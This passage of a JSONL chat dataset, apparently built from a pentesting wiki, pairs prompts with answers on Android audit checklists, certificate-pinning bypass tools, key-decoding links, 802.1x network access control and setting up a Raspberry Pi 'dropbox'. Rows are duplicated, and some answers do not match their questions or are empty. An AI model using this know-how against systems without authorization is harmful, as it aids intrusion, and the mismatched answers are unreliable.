pinning\n * Audit communications between phone and backends\n* Auditing platforms\n * Applications permissions\n * Fragments injection\n * Webview's user input\n * Webview's methods\n * Object persistence\n * Instants Apps\n * Custom URLs", "metadata": {"corpus_index": 1598, "category": "web", "source_file": "docs/src/mobile-apps/android.md", "page_title": "Android", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Android - Audits"}, {"role": "assistant", "content": "Auditing Android covers multiples domains.\n\n* Applications Storage\n * Presence of sensitive data inside files (API_KEY, secrets)\n * Presence of sensitive data inside backups\n * Presence of sensitive data inside logs\n * Presence of sensitive data inside cache\n * Presence of sensitive data inside memory\n* Communications\n * Certificate pinning\n * Audit communications between phone and backends\n* Auditing platforms\n * Applications permissions\n * Fragments injection\n * Webview's user input\n * Webview's methods\n * Object persistence\n * Instants Apps\n * Custom URLs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Android - Audits", "response": "Auditing Android covers multiples domains.\n\n* Applications Storage\n * Presence of sensitive data inside files (API_KEY, secrets)\n * Presence of sensitive data inside backups\n * Presence of sensitive data inside logs\n * Presence of sensitive data inside cache\n * Presence of sensitive data inside memory\n* Communications\n * Certificate pinning\n * Audit communications between phone and backends\n* Auditing platforms\n * Applications permissions\n * Fragments injection\n * Webview's user input\n * Webview's methods\n * Object persistence\n * Instants Apps\n * Custom URLs", "metadata": {"corpus_index": 1598, "category": "web", "source_file": "docs/src/mobile-apps/android.md", "page_title": "Android", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Android - Setup"}, {"role": "assistant", "content": "Auditing an Android APK requires a setup made of:\n\n* An Android smartphone (e.g. Pixel3A, or any other smartphone easy enough to root) or a Genymotion virtual machine (e.g. using MobSF)\n* A few utilities directly on the phone (whether it's real or virtual) \n * Frida Server\n * Drozer Server\n * Magisk App with Modules\n* A few utilities on the computer \n * Frida client\n * Drozer client\n * MobSF\n * A proxy (e.g. Burp Suite)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Android - Setup", "response": "Auditing an Android APK requires a setup made of:\n\n* An Android smartphone (e.g. Pixel3A, or any other smartphone easy enough to root) or a Genymotion virtual machine (e.g. using MobSF)\n* A few utilities directly on the phone (whether it's real or virtual) \n * Frida Server\n * Drozer Server\n * Magisk App with Modules\n* A few utilities on the computer \n * Frida client\n * Drozer client\n * MobSF\n * A proxy (e.g. Burp Suite)", "metadata": {"corpus_index": 1599, "category": "web", "source_file": "docs/src/mobile-apps/android.md", "page_title": "Android", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Android - Setup"}, {"role": "assistant", "content": "Auditing an Android APK requires a setup made of:\n\n* An Android smartphone (e.g. Pixel3A, or any other smartphone easy enough to root) or a Genymotion virtual machine (e.g. using MobSF)\n* A few utilities directly on the phone (whether it's real or virtual) \n * Frida Server\n * Drozer Server\n * Magisk App with Modules\n* A few utilities on the computer \n * Frida client\n * Drozer client\n * MobSF\n * A proxy (e.g. Burp Suite)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Android - Setup", "response": "Auditing an Android APK requires a setup made of:\n\n* An Android smartphone (e.g. Pixel3A, or any other smartphone easy enough to root) or a Genymotion virtual machine (e.g. using MobSF)\n* A few utilities directly on the phone (whether it's real or virtual) \n * Frida Server\n * Drozer Server\n * Magisk App with Modules\n* A few utilities on the computer \n * Frida client\n * Drozer client\n * MobSF\n * A proxy (e.g. Burp Suite)", "metadata": {"corpus_index": 1599, "category": "web", "source_file": "docs/src/mobile-apps/android.md", "page_title": "Android", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate pinning?"}, {"role": "assistant", "content": "bypass (need jailbroken)\n\n* https://github.com/nabla-c0d3/ssl-kill-switch2\n* https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate pinning?", "response": "bypass (need jailbroken)\n\n* https://github.com/nabla-c0d3/ssl-kill-switch2\n* https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing", "metadata": {"corpus_index": 1600, "category": "web", "source_file": "docs/src/mobile-apps/ios/certificate-pinning.md", "page_title": "Certificate pinning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate pinning"}, {"role": "assistant", "content": "bypass (need jailbroken)\n\n* https://github.com/nabla-c0d3/ssl-kill-switch2\n* https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate pinning", "response": "bypass (need jailbroken)\n\n* https://github.com/nabla-c0d3/ssl-kill-switch2\n* https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing", "metadata": {"corpus_index": 1600, "category": "web", "source_file": "docs/src/mobile-apps/ios/certificate-pinning.md", "page_title": "Certificate pinning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Locks?"}, {"role": "assistant", "content": "generate STL files for keys https://keygen.co/\n\ndecode key https://github.com/MaximeBeasse/KeyDecoder"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Locks?", "response": "generate STL files for keys https://keygen.co/\n\ndecode key https://github.com/MaximeBeasse/KeyDecoder", "metadata": {"corpus_index": 1601, "category": "web", "source_file": "docs/src/physical/lockpicking.md", "page_title": "Locks", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Locks"}, {"role": "assistant", "content": "generate STL files for keys https://keygen.co/\n\ndecode key https://github.com/MaximeBeasse/KeyDecoder"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Locks", "response": "generate STL files for keys https://keygen.co/\n\ndecode key https://github.com/MaximeBeasse/KeyDecoder", "metadata": {"corpus_index": 1601, "category": "web", "source_file": "docs/src/physical/lockpicking.md", "page_title": "Locks", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Network Access Control - Theory work?"}, {"role": "assistant", "content": "NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. It usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Network Access Control - Theory work?", "response": "NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. It usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network.", "metadata": {"corpus_index": 1602, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Network Access Control - Theory"}, {"role": "assistant", "content": "NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. It usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Network Access Control - Theory", "response": "NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. It usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network.", "metadata": {"corpus_index": 1602, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Network Access Control - Basics"}, {"role": "assistant", "content": "NAC is a principle. It can be setup with several measures.\n\n* Filtering of MAC addresses\n* Authentication with username & password\n* Authentication with certificates\n* Fingerprinting\n* Host checks\n\nNAC aims at protecting against the including, but not limited to, scenarios.\n\n* Employees bringing rogue devices (willingly or not)\n Service providers acting inside the IT / OT network\n* Attackers trying to gain access to the internal network\n\n_*IT/OT network: Information Technology (workstations, users, shares, ...) and_ _Operational Technology_ _(machines, productionl lines, ...)._"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Network Access Control - Basics", "response": "NAC is a principle. It can be setup with several measures.\n\n* Filtering of MAC addresses\n* Authentication with username & password\n* Authentication with certificates\n* Fingerprinting\n* Host checks\n\nNAC aims at protecting against the including, but not limited to, scenarios.\n\n* Employees bringing rogue devices (willingly or not)\n Service providers acting inside the IT / OT network\n* Attackers trying to gain access to the internal network\n\n_*IT/OT network: Information Technology (workstations, users, shares, ...) and_ _Operational Technology_ _(machines, productionl lines, ...)._", "metadata": {"corpus_index": 1603, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Network Access Control - Basics"}, {"role": "assistant", "content": "NAC is a principle. It can be setup with several measures.\n\n* Filtering of MAC addresses\n* Authentication with username & password\n* Authentication with certificates\n* Fingerprinting\n* Host checks\n\nNAC aims at protecting against the including, but not limited to, scenarios.\n\n* Employees bringing rogue devices (willingly or not)\n Service providers acting inside the IT / OT network\n* Attackers trying to gain access to the internal network\n\n_*IT/OT network: Information Technology (workstations, users, shares, ...) and_ _Operational Technology_ _(machines, productionl lines, ...)._"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Network Access Control - Basics", "response": "NAC is a principle. It can be setup with several measures.\n\n* Filtering of MAC addresses\n* Authentication with username & password\n* Authentication with certificates\n* Fingerprinting\n* Host checks\n\nNAC aims at protecting against the including, but not limited to, scenarios.\n\n* Employees bringing rogue devices (willingly or not)\n Service providers acting inside the IT / OT network\n* Attackers trying to gain access to the internal network\n\n_*IT/OT network: Information Technology (workstations, users, shares, ...) and_ _Operational Technology_ _(machines, productionl lines, ...)._", "metadata": {"corpus_index": 1603, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Network Access Control - Infrastructure & auth flow"}, {"role": "assistant", "content": "Most commonly, NAC solution are based on 802.1x which is a standard for port based network access. It will interact with the switches (most likely and mainly via SNMP) and allow or block ports based on the preset rules. There are 3 actors involved:\n\n* The supplicant: the client that is asking for network access\n* The authenticator: the device that acts as the gatekeeper and to which the clients connects - most likely a switch.\n* The authentication server: something in the background that validates the requests and grants or denies access to the supplicant.\n\nBy default, the ports are in an unauthorized state and will only be allowed to transmit and receive EAPOL frames (Extensible Authentication Protocol Over LAN), which basically is encapsulated EAP.\n\n1. These EAPOL frames are forwarded from \"the client desiring access to the network\" to \"the switch\".\n2. The switch unpacks the EAPOL and forwards the EAP packet to an authentication server, which in most cases will be a RADIUS server.\n\nFrom there everything goes vice versa. As EAP is more a framework than a protocol, it contains several EAP methods for authentication. The most commonly known variants are EAP-TLS, EAP-MD5, EAP-PSK and EAP-IKEv2, allowing to authenticate by preshared keys, passwords, certificates or other mechanisms.\n\n![](<./assets/802.1x auth flow.png>)\n802.1x auth flow (Wikipedia){.caption}\n\nWhen all checks are passed, the port will be switched to authorized and thus be allowed for normal network traffic.\n\nAn infrastructure that is capable of talking 802.1x is needed for all this to work properly. The infrastructure is comprised of supplicants (i.e. clients), authenticators (i.e. switches) and authentication servers (i.e. RADIUS servers).\n\nA short overview from Gartner lists and reviews many NAC solutions: NAC Reviews & Ratings."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Network Access Control - Infrastructure & auth flow", "response": "Most commonly, NAC solution are based on 802.1x which is a standard for port based network access. It will interact with the switches (most likely and mainly via SNMP) and allow or block ports based on the preset rules. There are 3 actors involved:\n\n* The supplicant: the client that is asking for network access\n* The authenticator: the device that acts as the gatekeeper and to which the clients connects - most likely a switch.\n* The authentication server: something in the background that validates the requests and grants or denies access to the supplicant.\n\nBy default, the ports are in an unauthorized state and will only be allowed to transmit and receive EAPOL frames (Extensible Authentication Protocol Over LAN), which basically is encapsulated EAP.\n\n1. These EAPOL frames are forwarded from \"the client desiring access to the network\" to \"the switch\".\n2. The switch unpacks the EAPOL and forwards the EAP packet to an authentication server, which in most cases will be a RADIUS server.\n\nFrom there everything goes vice versa. As EAP is more a framework than a protocol, it contains several EAP methods for authentication. The most commonly known variants are EAP-TLS, EAP-MD5, EAP-PSK and EAP-IKEv2, allowing to authenticate by preshared keys, passwords, certificates or other mechanisms.\n\n![](<./assets/802.1x auth flow.png>)\n802.1x auth flow (Wikipedia){.caption}\n\nWhen all checks are passed, the port will be switched to authorized and thus be allowed for normal network traffic.\n\nAn infrastructure that is capable of talking 802.1x is needed for all this to work properly. The infrastructure is comprised of supplicants (i.e. clients), authenticators (i.e. switches) and authentication servers (i.e. RADIUS servers).\n\nA short overview from Gartner lists and reviews many NAC solutions: NAC Reviews & Ratings.", "metadata": {"corpus_index": 1604, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Network Access Control - Infrastructure & auth flow?"}, {"role": "assistant", "content": "Most commonly, NAC solution are based on 802.1x which is a standard for port based network access. It will interact with the switches (most likely and mainly via SNMP) and allow or block ports based on the preset rules. There are 3 actors involved:\n\n* The supplicant: the client that is asking for network access\n* The authenticator: the device that acts as the gatekeeper and to which the clients connects - most likely a switch.\n* The authentication server: something in the background that validates the requests and grants or denies access to the supplicant.\n\nBy default, the ports are in an unauthorized state and will only be allowed to transmit and receive EAPOL frames (Extensible Authentication Protocol Over LAN), which basically is encapsulated EAP.\n\n1. These EAPOL frames are forwarded from \"the client desiring access to the network\" to \"the switch\".\n2. The switch unpacks the EAPOL and forwards the EAP packet to an authentication server, which in most cases will be a RADIUS server.\n\nFrom there everything goes vice versa. As EAP is more a framework than a protocol, it contains several EAP methods for authentication. The most commonly known variants are EAP-TLS, EAP-MD5, EAP-PSK and EAP-IKEv2, allowing to authenticate by preshared keys, passwords, certificates or other mechanisms.\n\n![](<./assets/802.1x auth flow.png>)\n802.1x auth flow (Wikipedia){.caption}\n\nWhen all checks are passed, the port will be switched to authorized and thus be allowed for normal network traffic.\n\nAn infrastructure that is capable of talking 802.1x is needed for all this to work properly. The infrastructure is comprised of supplicants (i.e. clients), authenticators (i.e. switches) and authentication servers (i.e. RADIUS servers).\n\nA short overview from Gartner lists and reviews many NAC solutions: NAC Reviews & Ratings."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Network Access Control - Infrastructure & auth flow?", "response": "Most commonly, NAC solution are based on 802.1x which is a standard for port based network access. It will interact with the switches (most likely and mainly via SNMP) and allow or block ports based on the preset rules. There are 3 actors involved:\n\n* The supplicant: the client that is asking for network access\n* The authenticator: the device that acts as the gatekeeper and to which the clients connects - most likely a switch.\n* The authentication server: something in the background that validates the requests and grants or denies access to the supplicant.\n\nBy default, the ports are in an unauthorized state and will only be allowed to transmit and receive EAPOL frames (Extensible Authentication Protocol Over LAN), which basically is encapsulated EAP.\n\n1. These EAPOL frames are forwarded from \"the client desiring access to the network\" to \"the switch\".\n2. The switch unpacks the EAPOL and forwards the EAP packet to an authentication server, which in most cases will be a RADIUS server.\n\nFrom there everything goes vice versa. As EAP is more a framework than a protocol, it contains several EAP methods for authentication. The most commonly known variants are EAP-TLS, EAP-MD5, EAP-PSK and EAP-IKEv2, allowing to authenticate by preshared keys, passwords, certificates or other mechanisms.\n\n![](<./assets/802.1x auth flow.png>)\n802.1x auth flow (Wikipedia){.caption}\n\nWhen all checks are passed, the port will be switched to authorized and thus be allowed for normal network traffic.\n\nAn infrastructure that is capable of talking 802.1x is needed for all this to work properly. The infrastructure is comprised of supplicants (i.e. clients), authenticators (i.e. switches) and authentication servers (i.e. RADIUS servers).\n\nA short overview from Gartner lists and reviews many NAC solutions: NAC Reviews & Ratings.", "metadata": {"corpus_index": 1604, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Network Access Control - Hardware in the context of penetration testing"}, {"role": "assistant", "content": "A device, known as \"dropbox\", is needed to carry out according attacks when conducting NAC penetration tests. The following setup is a commonly used for this type of engagement.\n\n* Raspberry Pi 4 8GB\n* SD card\n* 3.5” TFT with Case\n* Additional USB Ethernet Adapter Power Adapter\n* Keyboard\n* (optional) Powerbank\n* (optional) LTE USB modem\n\n![](<./assets/Raspberry Pi drop box.png>)\nRaspberry Pi drop box{.caption}\n\nThe Raspberry can be flushed with the official ARM image of Kali.\n\nThe integrated wireless interface can be used to spawn a hotspot to be able to connect via SSH."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Network Access Control - Hardware in the context of penetration testing", "response": "A device, known as \"dropbox\", is needed to carry out according attacks when conducting NAC penetration tests. The following setup is a commonly used for this type of engagement.\n\n* Raspberry Pi 4 8GB\n* SD card\n* 3.5” TFT with Case\n* Additional USB Ethernet Adapter Power Adapter\n* Keyboard\n* (optional) Powerbank\n* (optional) LTE USB modem\n\n![](<./assets/Raspberry Pi drop box.png>)\nRaspberry Pi drop box{.caption}\n\nThe Raspberry can be flushed with the official ARM image of Kali.\n\nThe integrated wireless interface can be used to spawn a hotspot to be able to connect via SSH.", "metadata": {"corpus_index": 1605, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Network Access Control - Hardware?"}, {"role": "assistant", "content": "A device, known as \"dropbox\", is needed to carry out according attacks when conducting NAC penetration tests. The following setup is a commonly used for this type of engagement.\n\n* Raspberry Pi 4 8GB\n* SD card\n* 3.5” TFT with Case\n* Additional USB Ethernet Adapter Power Adapter\n* Keyboard\n* (optional) Powerbank\n* (optional) LTE USB modem\n\n![](<./assets/Raspberry Pi drop box.png>)\nRaspberry Pi drop box{.caption}\n\nThe Raspberry can be flushed with the official ARM image of Kali.\n\nThe integrated wireless interface can be used to spawn a hotspot to be able to connect via SSH."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Network Access Control - Hardware?", "response": "A device, known as \"dropbox\", is needed to carry out according attacks when conducting NAC penetration tests. The following setup is a commonly used for this type of engagement.\n\n* Raspberry Pi 4 8GB\n* SD card\n* 3.5” TFT with Case\n* Additional USB Ethernet Adapter Power Adapter\n* Keyboard\n* (optional) Powerbank\n* (optional) LTE USB modem\n\n![](<./assets/Raspberry Pi drop box.png>)\nRaspberry Pi drop box{.caption}\n\nThe Raspberry can be flushed with the official ARM image of Kali.\n\nThe integrated wireless interface can be used to spawn a hotspot to be able to connect via SSH.", "metadata": {"corpus_index": 1605, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Network Access Control - Initial setup?"}, {"role": "assistant", "content": "The following commands can then be run to install the necessary libraries and tools.\n\n``\nsudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd \n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Network Access Control - Initial setup?", "response": "The following commands can then be run to install the necessary libraries and tools.\n\n``\nsudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd \n``", "metadata": {"corpus_index": 1606, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Network Access Control - Initial setup?"}, {"role": "assistant", "content": "The following commands can then be run to install the necessary libraries and tools.\n\n``\nsudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd \n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Network Access Control - Initial setup?", "response": "The following commands can then be run to install the necessary libraries and tools.\n\n``\nsudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd \n``", "metadata": {"corpus_index": 1606, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the apt-get command for network access control - initial setup"}, {"role": "assistant", "content": "sudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the apt-get command for network access control - initial setup", "response": "sudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd", "metadata": {"corpus_index": 1607, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "apt-get"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Network Access Control - Initial setup during a pentest?"}, {"role": "assistant", "content": "sudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Network Access Control - Initial setup during a pentest?", "response": "sudo apt-get install isc-dhcp-server \nsudo apt-get install hostapd \nsudo systemctl enable isc-dhcp-server \nsudo systemctl unmask hostapd \nsudo systemctl enable hostapd", "metadata": {"corpus_index": 1607, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sudo apt-get install isc-dhcp-server`?"}, {"role": "assistant", "content": "This command is used for network access control - initial setup. Initial setup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sudo apt-get install isc-dhcp-server`?", "response": "This command is used for network access control - initial setup. Initial setup", "metadata": {"corpus_index": 1607, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Network Access Control - DHCP configuration work?"}, {"role": "assistant", "content": "The DHCP configuration file is located at /etc/dhcp/dhcpd.conf and can be edited to determine how the dropbox will act as a DHCP server.\n\n``\ndefault-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Network Access Control - DHCP configuration work?", "response": "The DHCP configuration file is located at /etc/dhcp/dhcpd.conf and can be edited to determine how the dropbox will act as a DHCP server.\n\n``\ndefault-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.200.0 netmask 255.255.255.0 {\nrange 192.168.200.2 192.168.200.20;\noption subnet-mask 255.255.255.0;\noption broadcast-address 192.168.200.255;\n}\n``", "metadata": {"corpus_index": 1608, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Network Access Control - DHCP configuration?"}, 